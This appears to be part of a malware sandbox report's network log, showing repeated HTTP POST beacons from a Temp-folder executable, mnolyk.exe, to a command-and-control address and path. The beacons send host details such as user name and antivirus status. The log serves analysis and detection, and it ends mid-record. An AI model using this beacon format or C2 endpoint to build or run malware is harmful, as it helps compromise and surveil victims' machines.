Feb 7, 2023 20:01:34.938281059 CET	294	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
161	192.168.2.6	49883	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:35.109836102 CET	294	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:35.175904036 CET	295	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
162	192.168.2.6	49884	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:35.347764015 CET	295	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:35.413851976 CET	296	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
163	192.168.2.6	49885	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:35.593496084 CET	296	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:35.655714989 CET	297	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
164	192.168.2.6	49886	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:35.832637072 CET	297	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:35.894501925 CET	298	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
165	192.168.2.6	49887	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:36.097176075 CET	298	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:36.162766933 CET	299	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
166	192.168.2.6	49888	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:36.353709936 CET	299	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:36.418462038 CET	300	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
167	192.168.2.6	49889	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:36.602318048 CET	300	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:36.667840004 CET	301	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
168	192.168.2.6	49890	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:36.846820116 CET	301	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:36.911346912 CET	302	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
169	192.168.2.6	49891	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:37.097124100 CET	302	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:37.162909031 CET	303	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.6	49735	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:54.983577967 CET	122	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:55.050860882 CET	122	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
170	192.168.2.6	49892	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:37.344208002 CET	303	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:37.409373045 CET	304	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
171	192.168.2.6	49893	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:37.604134083 CET	304	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:37.669632912 CET	305	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
172	192.168.2.6	49894	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:37.843817949 CET	305	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:37.907027960 CET	306	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
173	192.168.2.6	49895	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:38.089699984 CET	306	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:38.155802011 CET	307	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
174	192.168.2.6	49896	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:38.330965996 CET	307	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:38.395314932 CET	308	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
175	192.168.2.6	49897	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:38.564289093 CET	308	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:38.627590895 CET	309	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
176	192.168.2.6	49898	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:38.811964989 CET	309	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:38.875428915 CET	310	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
177	192.168.2.6	49899	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:39.123661041 CET	310	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:39.189034939 CET	311	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
178	192.168.2.6	49900	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:39.360455036 CET	311	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:39.425144911 CET	312	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
179	192.168.2.6	49901	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:39.612533092 CET	312	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:39.675569057 CET	313	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.6	49736	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:55.230834007 CET	123	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:55.295732975 CET	123	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
180	192.168.2.6	49902	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
